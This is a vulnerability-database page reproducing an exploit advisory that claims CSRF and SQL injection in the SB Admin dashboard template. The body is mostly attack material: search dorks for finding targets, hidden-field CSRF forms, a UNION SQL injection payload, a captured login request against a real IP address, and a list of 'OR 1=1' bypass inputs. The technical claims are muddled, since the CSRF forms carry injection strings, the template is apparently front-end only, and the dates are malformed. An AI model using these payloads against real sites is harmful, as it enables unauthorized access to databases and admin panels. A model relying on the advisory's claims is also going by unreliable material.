Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

SB Admin Cross Site Request Forgery / SQL Injection

🗓️ 17 Jan 2022 00:00:00Reported by Taurus OmarType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 367 Views

SB Admin CSRF/Sqli Vulnerability, High Severity, Affecting 1 Million Site

Code
`$$$$$$$\   
$$ __$$\   
$$ | $$ |$$\ $$\ $$\ $$$$$$$\ $$$$$$\ $$$$$$$\   
$$$$$$$ |$$ | $$ | $$ |$$ __$$\ $$ __$$\ $$ _____|  
$$ ____/ $$ | $$ | $$ |$$ | $$ | $$$$$$$$ |$$ /   
$$ | $$ | $$ | $$ |$$ | $$ | $$ ____|$$ |   
$$ | \$$$$$\$$$$ |$$ | $$ |$$\\$$$$$$$\ \$$$$$$$\   
\__| \_____\____/ \__| \__|\__|\_______| \_______|  
Offensive Security Community [Ecuador]  
  
  
Credits & Authors:  
==================  
Taurus Omar - @TaurusOmar_ (whoami@taurusomar) [taurusomar.com]  
  
Document Title:  
===============  
SB Admin Bootstrap CSRF / Sqli Vulnerability / Bypasss Login Access  
  
  
Severity Level:  
===============  
High  
  
Google & Bing Dorks  
===================  
intitle:SB Admin - login  
intitle:SB Admin 2 - login  
  
Affect  
===================  
Araound: 1 Millions of sites  
  
Vulnerability Reported Timeline:  
==================================  
2021-31-07: Reported  
  
Vulnerability Disclosure Timeline:  
==================================  
2022-15-01: Public Disclosure  
  
Discovery Status:  
=================  
Published  
  
Affected Product(s):  
====================  
SB Admin   
SB Admin 2  
  
Product & Service Introduction:  
===============================  
SB Admin, a well-known dashboard template recently migrated to Bootstrap 5.   
This iconic product comes with minimal custom styling using Google's material   
design patterns and pre-build pages like a dashboard, charts, data tables,   
and authentication pages, styles along with a variety of plugins to create a   
powerful framework for creating admin panels, web apps, or dashboard UI's for   
your next project. The product uses PUG templates, SCSS and JS scripts for   
compilation and production build (no Gulp or heavier Webpack).   
  
Abstract Advisory Information:  
==============================  
An independent researcher discovered Multiple Vulnerabilities in the official aplication SB Admin  
  
CSRF Technical Details & Description:  
=====================================  
A client-side cross site request forgery vulnerability has been discovered in the official SB Admin control web-application.  
The vulnerability allows to execute unauthorized client-side application functions without secure validation or session token protection mechanism.  
The security risk of the cross site request forgery vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 2.5.   
Exploitation of the vulnerability dont requires web-application user account and low user interaction. Successful exploitation of the vulnerability results in unauthorized add or add of SB Admin connect service panel staff.The web vulnerability can be exploited by any attackers.  
  
Proof video:  
============  
https://imgur.com/A6KuhcW  
  
Proof of Concept CSRF (PoC-1):  
==============================  
<html>  
<body>  
<form action="https://site.com/panel/index.html" method="POST">  
<div class="form-group">  
<input type="hidden" class="form-control form-control-user" aria-describedby="emailHelp" id="exampleInputEmail1" value="" OR 1 = 1 -- -"" required="">  
</div>  
<div class="form-group">  
<input type="hidden" class="form-control form-control-user" id="exampleInputPassword" value="" OR 1 = 1 -- -"" required="">  
</div>  
<div class="form-group">  
</div>  
</div>  
<button type="submit" class="btn btn-primary btn-user btn-block">  
Login  
</button>  
</form>  
  
Proof of Concept CSRF (PoC-2):  
==============================  
<html>  
<body>  
<form action="https://site.com/panel/index.php" method="POST">  
<div class="form-group">  
<input type="hidden" class="form-control form-control-user" aria-describedby="emailHelp" id="exampleInputEmail1" value="" OR 1 = 1 -- -"" required="">  
</div>  
<div class="form-group">  
<input type="hidden" class="form-control form-control-user" id="exampleInputPassword" value="" OR 1 = 1 -- -"" required="">  
</div>  
<div class="form-group">  
</div>  
</div>  
<button type="submit" class="btn btn-primary btn-user btn-block">  
Login  
</button>  
</form>  
  
  
Sqli Technical Details & Description:  
=====================================  
The SQL injection attack consists of insertion or “injection” of a SQL query via   
the input-login data from the client to the application. The successful SQL injection  
exploit can read sensitive data from the database, modify database data   
(Insert/Update/Delete), execute administration operations on the database   
(such as shutdown the DBMS), recover the content of a given file present on the DBMS file system.  
  
Proof video:  
============  
https://imgur.com/0Z7vtj4  
  
Payload:  
========  
usuario=§" OR 1 = 1 UNION ALL SELECT CONCAT(0x716b767671,0x677571554f657363504e4974794a7a4a6e43786b727a45514d5146766f6241706a73716e4c527651,0x7178627071),NULL-- - -- -"§&password=§" OR 1 = 1 -- -"§  
  
BurpSuite  
==========  
POST /requisicao/login.php HTTP/1.1  
Host: 186.251.225.174  
Content-Length: 47  
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36  
Content-Type: application/x-www-form-urlencoded  
Accept: */*  
Origin: http://186.251.225.174  
Referer: http://186.251.225.174/login.html  
Accept-Encoding: gzip, deflate  
Accept-Language: es-CO,es;q=0.9  
Connection: close  
  
usuario=" OR 1 = 1 -- -"&senha=" OR 1 = 1 -- -"  
  
Inputs Vulnerabilities  
======================  
usuario=" OR 1 = 1 -- -"&senha=" OR 1 = 1 -- -"  
email=" OR 1 = 1 -- -"&password=" OR 1 = 1 -- -"  
username=" OR 1 = 1 -- -"&password=" OR 1 = 1 -- -"  
user=" OR 1 = 1 -- -"&pass=" OR 1 = 1 -- -"  
  
  
#######  
#  
# Disclaimer:  
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.   
# The usual disclaimer applies, especially the fact that Taurus Omar is not liable for any damages   
# caused by direct or indirect use of the information or functionality provided by these programs.   
# The author or any Internet provider bears NO responsibility for content or misuse of these programs   
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,   
# system crash, system compromise, etc.) caused by the use of these programs are not Taurus Omar's   
# responsibility.  
#  
#######  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
17 Jan 2022 00:00Current
0.6Low risk
Vulners AI Score0.6
csrfsql injectionvulnerabilitysb adminbootstrap 5dashboard template
367